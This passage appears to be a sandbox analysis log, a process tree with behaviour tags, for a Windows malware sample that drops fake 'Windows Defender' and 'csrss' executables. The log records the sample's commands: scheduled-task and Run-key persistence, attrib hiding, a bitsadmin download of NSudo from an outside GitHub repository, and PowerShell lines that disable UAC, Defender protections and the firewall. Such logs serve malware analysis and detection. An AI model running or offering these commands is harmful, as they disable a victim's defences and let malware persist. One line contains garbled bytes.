- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5072
-
-
C:\Program Files (x86)\VLC1.EXE"C:\Program Files (x86)\VLC1.EXE"4⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:668 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Program Files (x86)\VLC1.EXE" +s +h5⤵PID:1812
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)\VLC1.EXE" +s +h6⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
PID:4140
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Program Files (x86)" +s +h5⤵
- System Location Discovery: System Language Discovery
PID:2328 -
C:\Windows\SysWOW64\attrib.exeattrib "C:\Program Files (x86)" +s +h6⤵
- Sets file to hidden
- Views/modifies file attributes
PID:5256
-
-
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exe"C:\Users\Admin\Documents\MSDCSC\msdcsc.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1876
-
-
-
C:\Program Files (x86)\WINDOWS DEFENDER.EXE"C:\Program Files (x86)\WINDOWS DEFENDER.EXE"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2840 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "csrss" /tr '"C:\Users\Admin\AppData\Roaming\csrss.exe"' & exit5⤵PID:2296
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "csrss" /tr '"C:\Users\Admin\AppData\Roaming\csrss.exe"'6⤵
- Scheduled Task/Job: Scheduled Task
PID:5304
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9B3C.tmp.bat""5⤵
- System Location Discovery: System Language Discovery
PID:3040 -
C:\Windows\SysWOW64\timeout.exetimeout 36⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4580
-
-
C:\Users\Admin\AppData\Roaming\csrss.exe"C:\Users\Admin\AppData\Roaming\csrss.exe"6⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Modifies Control Panel
PID:2748
-
-
-
-
C:\Program Files (x86)\WINDOWS SECURITY NANO.EXE"C:\Program Files (x86)\WINDOWS SECURITY NANO.EXE"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:2000
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\MSDCSC\msdcsc.exe1⤵PID:4192
-
C:\Users\Admin\Documents\MSDCSC\msdcsc.exeC:\Users\Admin\Documents\MSDCSC\msdcsc.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5652 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\script.bat" "3⤵PID:5272
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:552
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1468
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:2992
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:644
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:4960
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
PID:1624
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
PID:1816
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:912
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:1100
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:5464
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4468
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:4260
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3108
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:5224
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:4128
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4368
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:6032
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
PID:5372
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
PID:4528
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:1880
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:1588
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
PID:3036
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5456
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1580
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5688
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
PID:652
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
PID:5980
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:1264
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:2008
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
PID:4712
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:2056
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:1492
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5312
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:5920
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:3328
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3048
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:5164
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:3928
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:4572
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:2196
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:2072
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:5972
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:2812
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:5256
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:5332
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
PID:3844
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:4920
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:4656
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5856
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:6080
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:4504
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:2040
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5320
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1620
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:3452
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:1336
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:4424
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:732
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:3144
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
PID:2764
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:4976
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:2372
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:1940
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5992
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
PID:4672
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
PID:3200
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:552
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1468
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:2992
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
PID:4372
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:3048
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:5164
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:404
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:2568
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:5008
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:1984
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:2340
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:3536
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
PID:5256
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:5944
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:5640
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
PID:4128
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:4368
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:6032
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
PID:3152
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:5372
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:4724
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:6036
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2924
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:1588
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:1132
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:5744
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:5688
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:652
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
PID:5980
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:1264
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
PID:5168
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:5284
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:2212
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:2056
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:1492
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:5312
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:5920
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3328
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1128
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- System Location Discovery: System Language Discovery
PID:2636
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:236
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:1816
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:2196
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:1100
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:5464
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:2812
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵PID:4260
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:3108
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 0.014⤵
- Delays execution with timeout.exe
PID:5224
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\script.bat" "3⤵
- System Location Discovery: System Language Discovery
PID:4304 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe4⤵
- Download via BitsAdmin
PID:5856
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\script.bat" "3⤵PID:5168
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe4⤵
- Download via BitsAdmin
PID:4976
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""4⤵
- Command and Scripting Interpreter: PowerShell
PID:1096
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"4⤵
- Command and Scripting Interpreter: PowerShell
PID:2264
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force4⤵
- UAC bypass
PID:652
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"4⤵
- Command and Scripting Interpreter: PowerShell
PID:4192
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\script.bat" "3⤵PID:4472
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe4⤵
- Download via BitsAdmin
PID:1084
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""4⤵
- Command and Scripting Interpreter: PowerShell
PID:5372
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"4⤵
- Command and Scripting Interpreter: PowerShell
PID:4712
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force4⤵
- UAC bypass
PID:6116
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"4⤵
- Command and Scripting Interpreter: PowerShell
PID:3684
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -PUAProtection disable"4⤵
- Command and Scripting Interpreter: PowerShell
PID:5268
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:2520
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"4⤵
- Command and Scripting Interpreter: PowerShell
PID:6328
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"4⤵
- Command and Scripting Interpreter: PowerShell
PID:6724
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"4⤵
- Command and Scripting Interpreter: PowerShell
PID:6412
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ScanScheduleDay 8"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:6972
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "netsh advfirewall set allprofiles state off"4⤵
- Command and Scripting Interpreter: PowerShell
PID:4500 -
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:860
-
-
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 104⤵PID:6320
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\script.bat" "3⤵PID:4260
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe4⤵
- Download via BitsAdmin
- System Location Discovery: System Language Discovery
PID:4684
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""4⤵
- Command and Scripting Interpreter: PowerShell
PID:2056
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"4⤵
- Command and Scripting Interpreter: PowerShell
PID:5244
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force4⤵
- UAC bypass
PID:1456
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:5284
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -PUAProtection disable"4⤵
- Command and Scripting Interpreter: PowerShell
PID:4992
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:6232
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"4⤵
- Command and Scripting Interpreter: PowerShell
PID:6612
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"4⤵
- Command and Scripting Interpreter: PowerShell
PID:6228
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"4⤵
- Command and Scripting Interpreter: PowerShell
PID:6344
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ScanScheduleDay 8"4⤵
- Command and Scripting Interpreter: PowerShell
PID:3320
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "netsh advfirewall set allprofiles state off"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:5888 -
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:6260
-
-
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 104⤵
- Delays execution with timeout.exe
PID:1632
-
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\setup.exe" --uninstall --system-level3⤵
- Drops file in Windows directory
PID:1264 -
C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff763ba1f58,0x7ff763ba1f64,0x7ff763ba1f704⤵
- Drops file in Windows directory
PID:3420
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --uninstall4⤵PID:744
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeb6efdcf8,0x7ffeb6efdd04,0x7ffeb6efdd105⤵PID:5936
-
-
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\setup.exe" --uninstall --system-levelÉÕÚº.Ì|Ÿaˆfñ,¼à[ CÈÆ"°î¯á²Ò.¤nžgé¨ìíŲ§6H{r Vg õ±´ÉºÅH Ú’™ ȵ‰ÛqYRœ4xxW{BþÝÅdÛrxFÌW›3⤵
- Drops file in Windows directory
PID:3192 -
C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x28c,0x290,0x294,0x268,0x298,0x7ff763ba1f58,0x7ff763ba1f64,0x7ff763ba1f704⤵PID:3204
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Roaming\script.html3⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:4200 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x36c,0x7ffe941cf208,0x7ffe941cf214,0x7ffe941cf2204⤵PID:1348
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1824,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=2144 /prefetch:114⤵PID:1552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2112,i,14447942471345739769,9197148038064725203,262144 --variations-seed-version --mojo-platform-channel-handle=2120 /prefetch:24⤵PID:3476
-
-
